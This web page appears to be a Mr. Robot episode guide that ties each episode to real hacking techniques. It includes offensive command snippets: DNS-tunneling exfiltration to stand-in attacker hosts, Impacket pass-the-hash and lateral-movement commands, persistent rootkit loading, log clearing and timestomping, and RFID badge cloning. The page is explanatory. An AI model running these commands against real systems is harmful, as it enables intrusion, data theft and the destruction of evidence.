The Rubber Ducky's PowerShell payload provides a reverse shell into the FBI's network, granting fsociety access to investigation files, case evidence, and internal communications about the 5/9 hack.

09

Hidden Process

eps2.8_h1dden-pr0cess.axx
+
Rootkit Process Hiding DKOM Volatility

Hacks & Techniques

1. Hidden Process Techniques

The episode explores process hiding -- techniques for concealing malicious processes from system monitoring tools:

  • Kernel Rootkits: Hook system calls (sys_getdents) to filter process entries from /proc
  • LD_PRELOAD Hijacking: Override shared library functions to hide process information
  • DKOM (Direct Kernel Object Manipulation): Unlink process entries from the kernel's task list
  • Process Hollowing: Spawn a legitimate process and replace its code with malicious code
  • Process Doppelganging: Use NTFS transactions to load malicious code
# Detection: Compare /proc listing with ps output ls /proc | grep -E '^[0-9]+$' | sort -n > /tmp/proc_list ps aux | awk '{print $2}' | sort -n > /tmp/ps_list diff /tmp/proc_list /tmp/ps_list # Differences indicate hidden processes # Using unhide tool for detection unhide proc unhide sys # Memory forensics with Volatility volatility -f memory.dump --profile=LinuxUbuntu pslist volatility -f memory.dump --profile=LinuxUbuntu psscan # Finds hidden processes
2. FBI Hack Exploitation

fsociety begins actively exploiting the access gained through the femtocell and Rubber Ducky, exfiltrating FBI investigation data and monitoring agent communications in real-time.

10

Python Part 1

eps2.9_pyth0n-pt1.p7z
+
Python 7-Zip AES APT Tactics Zero-Day

Hacks & Techniques

1. Python for Offensive Security

Python is the primary scripting language for hacking in Mr. Robot. Key Python libraries used in offensive security:

  • Scapy: Packet manipulation and network scanning
  • Requests: HTTP library for web exploitation
  • Paramiko: SSH protocol implementation
  • Pwntools: CTF and binary exploitation framework
  • Impacket: Network protocol implementation (SMB, MSRPC, Kerberos)
2. Encrypted Archives for Exfiltration

The .p7z extension references 7-Zip encrypted archives using AES-256, commonly used for secure data exfiltration:

# Create AES-256 encrypted 7z archive 7z a -p"StrongPassword" -mhe=on exfil_data.7z /sensitive/data/ # -p: password protection # -mhe=on: encrypt file headers (hides filenames)
3. Dark Army APT Operations

The Dark Army operates as a state-sponsored Advanced Persistent Threat (APT) with sophisticated capabilities:

  • Zero-Day Exploits: Previously unknown vulnerabilities reserved for critical operations
  • Supply Chain Attacks: Compromising trusted software/hardware providers
  • Extreme OPSEC: Time-based operations, compartmentalization, elimination of compromised operatives
11

Python Part 2 (Season Finale)

eps2.9_pyth0n-pt2.p7z
+
Stage 2 Revealed UPS Firmware SCADA/ICS Thermal Runaway

Hacks & Techniques

1. Stage 2 Revealed: UPS Firmware Attack

The season finale reveals that the 5/9 hack had a Stage 2 -- designed to physically destroy E Corp's paper backup records by compromising UPS (Uninterruptible Power Supply) firmware to cause battery thermal runaway and fires.

  • Target: UPS systems with network management cards (APC, Eaton, CyberPower)
  • Attack: Modified firmware overrides battery charging safety limits
  • Effect: Overcharging lithium-ion batteries causes thermal runaway (swelling, fire, explosion)
  • Goal: Destroy paper records E Corp is using to rebuild financial data
In 2022, Armis Labs disclosed "TLStorm" (CVE-2022-22805, CVE-2022-22806) -- critical vulnerabilities in APC Smart-UPS devices allowing remote code execution and firmware manipulation. This validated the show's 2016 premise. Stuxnet (2010) previously demonstrated that firmware-level attacks on industrial systems can cause physical destruction.
2. IT-to-OT Network Pivoting

The attack requires lateral movement from IT networks to OT (Operational Technology) networks that control the UPS systems. This is one of the most critical attack paths in modern ICS security.

  • SCADA Protocols: Modbus, DNP3, BACnet -- often lack authentication
  • Default Credentials: Many ICS devices ship with hardcoded or default passwords
  • Air Gap Myth: OT networks are often not truly air-gapped from IT networks

// SEASON 3

The battle for Stage 2. Elliot races to undo the Dark Army's plan to destroy E Corp's paper records via UPS firmware attacks, while the FBI femtocell provides critical intelligence. The most technically dense season.

01

Power Saver Mode

eps3.0_power-saver-mode.h
+
UPS Firmware HSM

Hacks & Techniques

1. UPS Firmware Manipulation (Stage 2 Core)

The core of Stage 2 is revealed: malware that modifies the firmware of UPS (Uninterruptible Power Supply) units in E Corp's paper record storage buildings. The attack targets battery charging circuitry to cause thermal runaway -- overcharging lithium-ion batteries until they overheat, swell, and catch fire.

  • Attack Target: UPS network management cards (NMC) with web interfaces
  • Firmware Modification: Override charging safety limits and temperature cutoffs
  • Physical Effect: Thermal runaway in lithium-ion battery packs
  • Goal: Building fires destroying paper records
2. Hardware Security Module (HSM) Access

Elliot tries to access E Corp's HSM (Hardware Security Module) to recover the encryption keys from the 5/9 hack. HSMs are tamper-resistant hardware devices used to manage cryptographic keys, performing encryption/decryption operations in a secure hardware environment.

  • HSM Standards: FIPS 140-2 Level 3 or 4 certified
  • Tamper Protection: Physical intrusion detection, key zeroization on tamper
  • Vendors: Thales (nCipher), Gemalto, Utimaco
02

Undo

eps3.1_undo.gz
+
Firmware Patching Network Segmentation

Hacks & Techniques

1. Reversing Stage 2 from Inside E Corp

Elliot, now working as an E Corp cybersecurity technician, attempts to patch the UPS firmware vulnerability from inside, deploying clean firmware updates without alerting the Dark Army.

  • Challenge: Craft clean firmware image that reverses malicious modifications
  • Method: Deploy through E Corp's management infrastructure
  • Stealth: Must appear as routine maintenance, not remediation
2. Network Segmentation (IT vs OT)

E Corp's network architecture features segmentation between IT and OT networks. Elliot must navigate Active Directory permissions, change management procedures, and network boundaries to reach the UPS controllers.

3. Insider Threat: Tyrell as CTO

Tyrell Wellick is installed as E Corp's new CTO, providing the Dark Army with insider access at the executive level. This is privilege escalation via social position -- the most dangerous form of insider threat.

The Lockheed Martin Cyber Kill Chain identifies "insider threat" as one of the most difficult vectors to defend against. Real-world APT groups like APT1 (China) have been known to recruit or install insiders in target organizations.
03

Legacy

eps3.2_legacy.so
+
Femtocell

Hacks & Techniques

1. FBI Femtocell Setup

Building toward the FBI femtocell hack execution. The modified femtocell intercepts all cellular communications passing through it by acting as a rogue base station with a stronger signal than legitimate towers.

At DEF CON 21 (2013), researchers demonstrated femtocell hacking using modified Verizon Network Extenders. The iSEC Partners team showed they could intercept calls, SMS, and data from any phone connecting to the rogue cell.
2. Darlene as Double Agent (HUMINT)

Darlene cooperates with the FBI as an informant while secretly feeding information to fsociety. This is classic HUMINT (Human Intelligence) tradecraft applied to cyber operations -- a double-agent operating across organizational boundaries.

  • Burner Phones: Prepaid disposable phones for single-use communication
  • Dead Drops: Pre-arranged locations for leaving/collecting information
  • Compartmentalization: Each operative knows only their specific task
04

Metadata

eps3.3_metadata.par2
+
Metadata Analysis IDS Evasion

Hacks & Techniques

1. Metadata Surveillance

The FBI uses metadata analysis to track Dark Army operations. Phone metadata (call detail records, cell tower logs, timing patterns) reveals communication networks without accessing content.

  • CDR (Call Detail Records): Who called whom, when, for how long
  • Cell Tower Logs: Physical location of phones at specific times
  • Pattern Analysis: Identifying relationships and meeting patterns
NSA's bulk metadata collection program (revealed by Snowden in 2013) demonstrated that metadata alone -- without content -- can reveal intimate details about individuals' lives, relationships, and activities.
2. IDS/IPS Evasion - Living Off the Land

Elliot evades E Corp's Intrusion Detection Systems by using Living Off the Land (LOtL) techniques -- using legitimate system administration tools rather than known hacking tools, making his activities blend with normal operations.

  • LOtL Tools: PowerShell, WMI, PsExec, native OS utilities
  • Advantage: No malware signatures to detect; activities appear legitimate
  • Evasion: Blends with normal admin traffic in IDS/SIEM logs
3. Whiterose's Long-Term Social Engineering of Angela

Whiterose manipulates Angela through deep psychological manipulation, targeting beliefs and emotional vulnerabilities. This represents the most advanced form of social engineering -- changing a target's fundamental worldview over an extended period.

05

Runtime Error (Single-Take Episode)

eps3.4_runtime-error.r00
+
Stage 2 Execution Thermal Runaway Lateral Movement

Hacks & Techniques

1. Stage 2 Execution: UPS Thermal Runaway Attack

The UPS firmware exploit triggers, causing battery thermal runaway across not one but 71 E Corp buildings. The Dark Army expanded the attack from a single target to dozens, overwhelming Elliot's ability to stop it.

  • Attack Chain: Compromised firmware → override charging safety limits → thermal runaway → fire/explosion
  • Scale: 71 buildings simultaneously targeted
  • Impact: Physical destruction of paper records and building infrastructure
  • Casualties: The attack results in deaths -- the first time the hack has lethal consequences
Samsung Galaxy Note 7 battery fires (2016) demonstrated real-world thermal runaway in lithium-ion batteries. Stuxnet (2010) showed firmware-level attacks causing physical destruction of centrifuges. TLStorm vulnerabilities in APC Smart-UPS (2022) confirmed that the show's premise was technically viable.
2. Emergency Lateral Movement

Elliot races to issue emergency commands to halt the UPS firmware attack, pivoting through E Corp's network to reach OT systems controlling UPS units in remote buildings.

  • Lateral Movement: Moving from compromised system to access others in the network
  • Living Off the Land: Using legitimate admin tools and credentials
  • Emergency Patching: Attempting to push firmware fixes to remote UPS controllers
3. Physical Security & SOC Response

The single-take format showcases physical security measures (badge access, security guards, locked server rooms) and real-time Security Operations Center (SOC) incident response, with analysts reviewing alerts and logs as the attack unfolds.

06

Kill Process

eps3.5_kill-process.inc
+
False Flag Attribution Digital Forensics

Hacks & Techniques

1. False Flag Attribution

The Dark Army stages evidence to make the 71-building attack appear to be state-sponsored by Iran. False flag operations in cyber warfare involve planting misleading evidence to misdirect attribution.

  • Planted Evidence: Foreign-language strings in malware code
  • Infrastructure Mimicry: Using IP addresses/infrastructure associated with Iranian APT groups
  • TTP Imitation: Mimicking Tactics, Techniques, and Procedures of known Iranian groups
  • Compilation Timestamps: Setting timestamps to match Iranian business hours
Olympic Destroyer (2018) -- malware targeting the Pyeongchang Olympics contained sophisticated false flags pointing to North Korea and China. It was ultimately attributed to Russian GRU (Sandworm team). This demonstrated that false flag attribution in cyber operations is a real and effective tactic.
2. Digital Forensics Investigation

The FBI conducts forensic analysis of the compromised UPS controllers:

  • Forensic Disk Imaging: Bit-for-bit copies of compromised firmware/storage
  • Firmware Analysis: Reverse engineering modified firmware binaries
  • Chain of Custody: Maintaining legal admissibility of digital evidence
  • Attribution Challenges: Distinguishing real IOCs from planted false flags
3. Evidence Destruction

Characters destroy digital evidence linking them to Stage 2:

# Secure file deletion shred -vfz -n 7 /path/to/evidence srm -sz /path/to/sensitive_files/ # Overwrite free disk space dd if=/dev/urandom of=/tmp/fill bs=1M; rm -f /tmp/fill # Clear system logs journalctl --vacuum-time=1s echo "" | tee /var/log/auth.log /var/log/syslog
07

Fredrick + Tanya

eps3.6_fredrick+tanya.chk
+
Femtocell SS7 Exploitation MITM Cellular USRP SDR

Hacks & Techniques

1. FBI Femtocell Hack Execution

The femtocell attack against the FBI reaches full operational capability. The modified femtocell inside the FBI field office intercepts all cellular communications:

  • Hardware: Modified consumer femtocell + USRP (Universal Software Radio Peripheral) SDR
  • Software: OpenBTS or OsmocomBB for GSM/3G stack
  • Capture Tool: Wireshark for traffic capture and analysis
  • Interception: Voice calls, SMS, mobile data, location data
2. SS7 Protocol Exploitation

The femtocell leverages weaknesses in SS7 (Signaling System 7), the protocol suite governing global telecommunications. SS7 was designed in the 1970s with no authentication, allowing anyone with network access to intercept calls and SMS.

  • Call Interception: Redirect calls through attacker infrastructure
  • SMS Interception: Read SMS messages in transit (including 2FA codes)
  • Location Tracking: Query subscriber location in real-time
  • Call Forwarding: Silently redirect calls without user knowledge
In 2014, German researchers demonstrated SS7 attacks on 60 Minutes (CBS), intercepting a US congressman's phone calls with his knowledge. SS7 vulnerabilities have been used to intercept 2FA SMS codes for bank fraud. The GSMA has acknowledged these vulnerabilities but full remediation remains incomplete.
08

Don't Delete Me

eps3.7_dont-delete-me.ko
+
Kernel Rootkit Browser Fingerprinting File Carving

Hacks & Techniques

1. Linux Kernel Module Rootkits (.ko)

The .ko extension references Linux kernel object files -- loadable kernel modules. A malicious .ko file operates at the deepest OS level:

  • Syscall Hooking: Intercept system calls to hide files, processes, and network connections
  • DKOM: Directly manipulate kernel data structures
  • Keylogging: Capture keystrokes at the kernel level
  • Persistence: Survive reboots if installed in /etc/modules or initramfs
# Load a kernel module insmod rootkit.ko # Or persistently cp rootkit.ko /lib/modules/$(uname -r)/ depmod -a echo "rootkit" >> /etc/modules # Detection lsmod | grep suspicious cat /proc/modules # Compare loaded modules with expected baseline
2. Data Recovery & File Carving

The "don't delete me" title references data recovery -- deleted files can often be recovered because deletion only removes filesystem pointers, not the actual data on disk.

  • Autopsy / Sleuth Kit: Open-source digital forensics platform
  • PhotoRec: File carving tool that recovers files based on headers/signatures
  • Scalpel: High-performance file carver
  • extundelete: Recover deleted files from ext3/ext4 filesystems
09

Stage 3

eps3.8_stage3.torrent
+
BitTorrent Key Recovery Shamir's Secret Sharing Traffic Analysis

Hacks & Techniques

1. BitTorrent for Mass Data Distribution

The .torrent extension references the BitTorrent protocol for decentralized file distribution. Once data is seeded across the P2P network, it becomes nearly impossible to remove.

  • Mechanism: Files split into pieces, distributed across peers
  • Resilience: No central server; removal requires taking down all seeders
  • Anonymity: Magnet links require no tracker; DHT provides decentralized discovery
WikiLeaks distributed "insurance files" via BitTorrent -- encrypted archives that could be decrypted if anything happened to the organization. This ensures information survival even if the source is compromised.
2. Reversing 5/9 Encryption & Key Recovery

Elliot works to recover E Corp's encryption keys using Shamir's Secret Sharing -- a cryptographic scheme that splits a secret into parts where a minimum threshold of parts is needed to reconstruct it.

  • Shamir's Secret Sharing: (k, n) threshold scheme -- need k of n shares to reconstruct
  • HSM Key Recovery: Accessing backup key material from Hardware Security Modules
  • Key Fragments: Distributed across multiple secure locations
3. NetFlow Traffic Analysis

FBI conducts NetFlow analysis to trace Dark Army communications by examining network flow metadata:

  • NetFlow: Cisco protocol recording source/destination IPs, ports, protocols, bytes transferred
  • Correlation: Matching timestamps and packet sizes to de-anonymize traffic
  • Pattern Recognition: Identifying communication patterns despite encryption
10

Shutdown -r (Season Finale)

eps3.9_shutdown-r
+
Key Distribution DNS Tunneling Supply Chain Anti-Forensics

Hacks & Techniques

1. Reversing the 5/9 Hack

Elliot successfully ships E Corp's encryption keys to reverse the original hack. The challenge of PKI (Public Key Infrastructure) key distribution at scale -- distributing decryption keys securely to thousands of systems.

# The shutdown -r command (episode title) shutdown -r now # Reboot system immediately shutdown -r +5 # Reboot in 5 minutes # Symbolically represents a "reset" for both systems and narrative
2. Femtocell Data Exfiltration via DNS Tunneling

Data captured by the femtocell is exfiltrated using DNS tunneling -- encoding data within DNS queries and responses to bypass firewalls and content filters.

# DNS tunneling concept # Encode data as subdomain queries nslookup dGhpcyBpcyBleGZpbHRyYXRlZCBkYXRh.evil-dns.com # Tools: iodine, dnscat2, dns2tcp dnscat2 --dns host=attacker-dns.com,type=TXT # Data is encoded in DNS TXT records, bypassing most firewalls
3. Supply Chain Attack Concepts

The season reveals that the entire attack chain relied on supply chain compromise -- the UPS firmware was intercepted and modified during the update/deployment pipeline.

This presaged real-world supply chain attacks: SolarWinds (2020) compromised the Orion build process affecting 18,000+ organizations including US government agencies. Kaseya (2021) was used to distribute REvil ransomware to MSP customers. The show was years ahead of these real incidents.

// SEASON 4

The final season. Elliot takes on the Deus Group -- a shadow cabal of the world's most powerful people. Episode titles follow HTTP status codes (401-413). Features the Deus Group bank heist, physical penetration testing, and the series' most ambitious hacking sequences.

01

401 Unauthorized

eps4.0_401unauthorized.h
+
VM Detection

Hacks & Techniques

1. Virtual Machine Detection & Sandbox Evasion

Elliot discovers a target system is running inside a virtual machine. VM detection is critical for malware that needs to evade sandbox analysis and for attackers identifying honeypots.

  • MAC Address Prefixes: VMware (00:0C:29, 00:50:56), VirtualBox (08:00:27)
  • Process Checks: vmtoolsd, vmwaretray, VBoxService.exe, VBoxTray.exe
  • Registry Keys: HKLM\SOFTWARE\VMware, HKLM\SOFTWARE\Oracle\VirtualBox
  • CPUID: Hypervisor bit check via CPUID instruction
  • WMI Queries: Win32_ComputerSystem model containing "VIRTUAL" or "VMWARE"
  • Tool: Pafish (Paranoid Fish) -- automated sandbox/VM detection
# VM detection checks systemd-detect-virt # Linux - detects virtualization dmidecode -s system-manufacturer # Check hardware manufacturer lspci | grep -i vmware # Check for VM hardware cat /proc/scsi/scsi | grep -i vmware # Check SCSI devices # Windows checks wmic computersystem get model # "VMware Virtual Platform" reg query "HKLM\SOFTWARE\VMware, Inc.\VMware Tools"
2. OSINT on Deus Group Members

Elliot performs open-source intelligence gathering on Deus Group members, including financial records analysis, social media profiling, and network mapping of relationships between the world's most powerful individuals.

02

402 Payment Required

eps4.1_402paymentrequired.h
+
SWIFT Network RAT Deployment

Hacks & Techniques

1. Targeting Cyprus National Bank

Elliot targets the offshore banking infrastructure used by the Deus Group, performing reconnaissance on SWIFT network infrastructure -- the global system used for international wire transfers between banks.

  • SWIFT: Society for Worldwide Interbank Financial Telecommunication
  • Attack Surface: SWIFT Alliance Access terminals in bank networks
  • Recon: Mapping financial routing, identifying target accounts
The Bangladesh Bank heist (2016) saw attackers compromise SWIFT terminals to issue fraudulent transfer orders for $951 million, successfully stealing $81 million. This remains one of the largest cyber heists in history.
2. Social Engineering of Bank Employees

Pretexting -- creating fabricated scenarios to extract information from bank staff about internal procedures, account structures, and security protocols.

03

403 Forbidden

eps4.2_403forbidden.h
+
UEFI Rootkit USB Rubber Ducky

Hacks & Techniques

1. Firmware-Level Rootkits (UEFI/BIOS)

Discussion of firmware-level compromise where malware is embedded below the OS layer, surviving OS reinstalls and disk wipes.

  • UEFI Rootkits: Persist in motherboard firmware (SPI flash)
  • Survival: Cannot be removed by OS reinstall, disk format, or drive replacement
  • Detection: Requires firmware integrity checking tools
LoJax (discovered by ESET, 2018) was the first UEFI rootkit found in the wild, attributed to APT28 (Fancy Bear/Russian GRU). It persisted across OS reinstalls by modifying the SPI flash chip on the motherboard.
2. USB Keystroke Injection

The USB Rubber Ducky returns as a physical access attack vector, executing pre-programmed keystroke payloads when plugged into a target system.

04

404 Not Found

eps4.3_404notfound.h
+
Lateral Movement SIM Swapping Signal Protocol

Hacks & Techniques

1. Lateral Movement Techniques

Advanced lateral movement through compromised networks using Windows domain attack tools:

# Lateral movement techniques psexec.py domain/user:password@target cmd.exe # PsExec via Impacket wmiexec.py domain/user:password@target # WMI execution smbexec.py domain/user:password@target # SMB execution # Pass-the-Hash (no password needed, just the NTLM hash) pth-winexe -U domain/user%hash //target cmd.exe # Kerberos ticket attacks getTGT.py domain/user -hashes :ntlm_hash # Get TGT with hash getST.py -spn cifs/target domain/user # Get service ticket
2. SIM Swapping

SIM swapping involves social engineering a mobile carrier employee to transfer a victim's phone number to an attacker-controlled SIM card, enabling interception of calls, SMS, and 2FA codes.

  • Vector: Social engineering carrier call center employees
  • Impact: Takeover of phone number, interception of 2FA SMS codes
  • Targets: High-value individuals with cryptocurrency, banking access
SIM swapping has been used in numerous high-profile attacks, including the 2019 hack of Twitter CEO Jack Dorsey's account. In 2021, a SIM swapper was convicted for stealing $20 million in cryptocurrency.
05

405 Method Not Allowed (Silent Episode)

eps4.4_405methodnotallowed.h
+
Proxmark3 Network Tap Lock Picking

Hacks & Techniques

1. Physical Penetration of Virtual Realty Data Center

The famous near-silent episode follows Elliot and Darlene breaking into a secure server facility in real-time. This is one of the most technically detailed physical penetration testing sequences in television.

2. RFID/NFC Badge Cloning

Access badges are cloned using specialized hardware:

  • Proxmark3: Advanced RFID research tool for cloning HID iClass, MIFARE, EM4100 cards
  • ACR122U: NFC reader/writer for MIFARE and NFC tags
  • Attack Range: Some readers can capture badge data from several feet away
  • Write: Clone captured credentials to blank cards
# Proxmark3 badge cloning proxmark3> lf search # Auto-detect card type proxmark3> lf hid read # Read HID card proxmark3> lf hid clone 2006xxxxxxxx # Clone to blank card # For MIFARE cards proxmark3> hf mf rdsc # Read sector proxmark3> hf mf cload # Clone entire card
3. Lock Picking

Physical bypass of door locks using professional lockpicking tools: tension wrenches, pick sets, bypass tools. Standard practice in professional red team engagements.

4. Network Tap Installation

Installing a passive network tap to intercept traffic without detection:

  • Throwing Star LAN Tap: Passive ethernet tap that requires no power
  • Inline Tap: More sophisticated tap that can capture full-duplex traffic
  • Advantage: Passive taps are undetectable by network monitoring (no MAC address, no power draw)
5. Boot from External Media

Bypassing OS authentication by booting from a USB drive containing a live Linux distribution (Kali Linux), providing direct access to the filesystem without needing the installed OS password.

6. Security Camera Avoidance

Mapping camera coverage and timing movements to exploit blind spots. Physical pentesters observe camera rotation patterns, identify dead zones, and coordinate movement accordingly.

06

406 Not Acceptable

eps4.5_406notacceptable.h
+
Counter-Surveillance SIEM/Splunk Dead Man's Switch

Hacks & Techniques

1. FBI Surveillance Evasion

Counter-surveillance techniques to detect and evade FBI monitoring:

  • Tail Detection: Identifying physical surveillance teams through route changes
  • GPS Tracker Detection: Sweeping vehicles for planted tracking devices
  • RF Sweeping: Detecting hidden listening devices and transmitters
  • Device Hardening: Removing batteries from phones, using Faraday bags
2. Log Analysis & SIEM

Forensic log analysis using enterprise tools:

  • Splunk: Enterprise log aggregation and analysis
  • ELK Stack: Elasticsearch + Logstash + Kibana for log processing
  • Windows Event Logs: Security, System, Application logs
  • Syslog: Centralized Unix/Linux logging
07

407 Proxy Authentication Required

eps4.6_407proxyauthenticationrequired.h
+
Proxychains SOCKS5 Default Credentials

Hacks & Techniques

1. Proxy Chains & Traffic Obfuscation

Using multiple proxy servers to hide traffic origin:

# Proxychains configuration # /etc/proxychains4.conf strict_chain proxy_dns socks5 127.0.0.1 9050 # Tor socks5 proxy1.net 1080 # VPN exit 1 socks5 proxy2.net 1080 # VPN exit 2 http proxy3.net 8080 # HTTP proxy # Route any tool through proxy chain proxychains4 nmap -sT target proxychains4 curl http://target proxychains4 ssh user@target
2. IP Camera Default Credentials

Surveillance cameras compromised via default credentials -- a pervasive vulnerability in CCTV systems. Many IP cameras ship with admin/admin or similar defaults that are never changed.

Shodan (the IoT search engine) regularly finds hundreds of thousands of IP cameras with default credentials exposed to the internet. The Insecam website once aggregated feeds from thousands of unsecured cameras worldwide.
08

408 Request Timeout

eps4.7_408requesttimeout.h
+
Email Header Analysis VeraCrypt ICS/SCADA

Hacks & Techniques

1. Email Header Analysis

Tracing email origins by analyzing email headers:

  • Received Fields: Show the path through mail servers (read bottom to top)
  • X-Originating-IP: Reveals sender's original IP address
  • Message-ID: Can reveal server information and domain
  • SPF/DKIM/DMARC: Email authentication records for spoofing detection
2. Encrypted File Systems & Hidden Volumes

Using encrypted volumes with plausible deniability:

  • VeraCrypt: Full-disk encryption with hidden volume support
  • LUKS: Linux Unified Key Setup for disk encryption
  • Hidden Volumes: A second encrypted volume hidden within the first -- even under coercion, the existence of the hidden volume cannot be proven
# LUKS encrypted volume cryptsetup luksFormat /dev/sdb1 cryptsetup luksOpen /dev/sdb1 secure_volume mkfs.ext4 /dev/mapper/secure_volume mount /dev/mapper/secure_volume /mnt/secure
09

409 Conflict (The Deus Group Hack)

eps4.8_409conflict.h
+
SWIFT Compromise Wire Transfer Hijack 2FA Bypass SS7 Exploit

Hacks & Techniques

THE DEUS GROUP HACK -- Complete Multi-Stage Attack Chain

This is the centerpiece hack of Season 4 and arguably the entire series. Elliot and Darlene execute a coordinated attack to drain the bank accounts of every member of the Deus Group during their meeting.

Phase 1: OSINT & Target Enumeration

Identifying every Deus Group member and mapping their financial infrastructure:

  • Financial Records: Cross-referencing leaked data, OSINT, and gathered intelligence
  • Account Mapping: Identifying all bank accounts, shell companies, and trusts
  • Target Bank: Cyprus National Bank identified as central financial node
Phase 2: Cyprus National Bank SWIFT Compromise

Compromising the banking infrastructure that holds the Deus Group's money by targeting SWIFT messaging terminals:

  • Target: SWIFT Alliance Access software on bank workstations
  • Method: Network compromise + SWIFT terminal access
  • Capability: Issue unauthorized wire transfer orders
The Bangladesh Bank heist (Feb 2016) used this exact technique. Attackers compromised SWIFT terminals at Bangladesh Bank and issued 35 fraudulent transfer requests totaling $951 million. $81 million was successfully transferred before a typo ("fandation" instead of "foundation") raised suspicions.
Phase 3: Man-in-the-Middle on Financial Transactions

Real-time interception and modification of banking transactions, redirecting wire transfers to accounts controlled by Elliot.

Phase 4: Vishing (Voice Phishing) of Bank Staff

Darlene makes phone calls impersonating authority figures to manipulate bank staff into authorizing transactions. Uses knowledge of internal bank procedures to appear legitimate.

Phase 5: 2FA Bypass via SS7/SMS Interception

Bypassing two-factor authentication by intercepting SMS verification codes:

  • SS7 Exploitation: Exploiting telecom signaling protocol to intercept SMS
  • SIM Swapping: Alternative method to hijack phone numbers
  • Result: Complete bypass of SMS-based 2FA security
Phase 6: Cryptocurrency Laundering

Redirecting stolen funds through cryptocurrency to obscure the money trail:

  • Bitcoin Tumblers/Mixers: Break the transaction link between source and destination
  • Monero (XMR): Privacy-focused cryptocurrency with built-in obfuscation
  • Multi-Sig Wallets: Requiring multiple keys for fund access
10

410 Gone

eps4.9_410gone.h
+
Wealth Redistribution Anti-Forensics Timestomping

Hacks & Techniques

1. Automated Wealth Redistribution

Automated scripts distribute stolen Deus Group funds to millions of bank accounts worldwide. The scale of the operation is unprecedented -- a Robin Hood-style wealth redistribution via code.

2. Comprehensive Anti-Forensics

Covering all tracks after the hack:

# Timestomping (modify file timestamps to hide activity) timestomp evidence.doc -m "01/01/2020 00:00:00" # Metasploit touch -t 202001010000.00 /path/to/file # Linux # Secure file deletion shred -vfz -n 7 /path/to/evidence_files # Clear Windows Event Logs wevtutil cl Security wevtutil cl System wevtutil cl Application # Multi-pass disk wiping (DoD 5220.22-M standard) nwipe --method=dodshort /dev/sda
11

411 Length Required / eXit

eps4.10_411lengthrequired.h
+
Air-Gapped Network ICS/SCADA Nuclear Facility

Hacks & Techniques

1. Whiterose's Machine & Industrial Control Systems

The Washington Township power plant houses Whiterose's mysterious machine, controlled by large-scale industrial control systems -- the same class of systems targeted by Stuxnet.

2. Air-Gapped Network Breach

Attempting to access systems that are physically isolated from the internet:

  • USB Bridging: Using removable media to cross the air gap
  • TEMPEST: Capturing electromagnetic emanations from computer hardware
  • Acoustic Side-Channel: Extracting data via audio signals from hardware
  • Social Engineering: Convincing someone with physical access to bridge the gap
Stuxnet (2010) was the first known malware to successfully cross an air-gapped network. It spread via USB drives to reach the isolated Natanz uranium enrichment facility in Iran, ultimately destroying ~1,000 centrifuges by modifying Siemens PLC firmware.
12

412 Precondition Failed / whoami

eps4.11_412preconditionfailed.h
+
whoami Identity Verification

Hacks & Techniques

1. The whoami Command

The episode's title references one of the first commands run after gaining access to a system -- determining who you are and what privileges you have:

# Linux/Unix identity commands whoami # Current username id # UID, GID, groups groups # Group memberships sudo -l # Available sudo privileges # Windows identity commands whoami # DOMAIN\username whoami /all # Full identity info with privileges whoami /priv # Current privilege tokens net user %username% # Detailed user information
2. Identity & Access Management Themes

This deeply psychological episode uses computing metaphors -- processes, identities, access controls -- to explore Elliot's dissociative identity. The "precondition failed" represents the failure of Elliot's constructed reality to meet the requirements of truth.

13

413 Request Entity Too Large / Hello, Elliot (Series Finale)

eps4.12_413requestentitytoolarge.h
+
Kill Switch SCRAM Procedure ICS Prevention

Hacks & Techniques

1. Whiterose's Machine -- Nuclear Facility ICS

Elliot must disable Whiterose's machine before it causes a nuclear meltdown. He interfaces with the facility's industrial control systems to execute an emergency SCRAM (Safety Control Rod Axe Man) -- the emergency shutdown procedure for a nuclear reactor.

2. Malware Kill Switch

Deploying a kill switch to neutralize rogue code controlling the facility.

The WannaCry ransomware (May 2017) was stopped when security researcher Marcus Hutchins (@MalwareTech) discovered and activated its kill switch -- a hardcoded domain that, when registered and responding to HTTP requests, caused the malware to stop spreading. This single action prevented tens of billions of dollars in additional damage.
3. Post-Exploitation Cleanup & Series Conclusion

After the Deus Group hack succeeds, the stolen funds remain distributed due to blockchain immutability -- confirmed cryptocurrency transactions cannot be reversed. The series concludes with computing metaphors: Elliot's consciousness as a running process, the "Hello, Elliot" as a callback to "Hello, Friend" -- a system reboot of identity.

# The series, in code $ whoami elliot $ echo "Hello, Friend" # eps1.0 - The beginning $ echo "Hello, Elliot" # eps4.12 - The end $ kill -9 $$ # Terminate current process $ shutdown -r now # Reboot. Start over.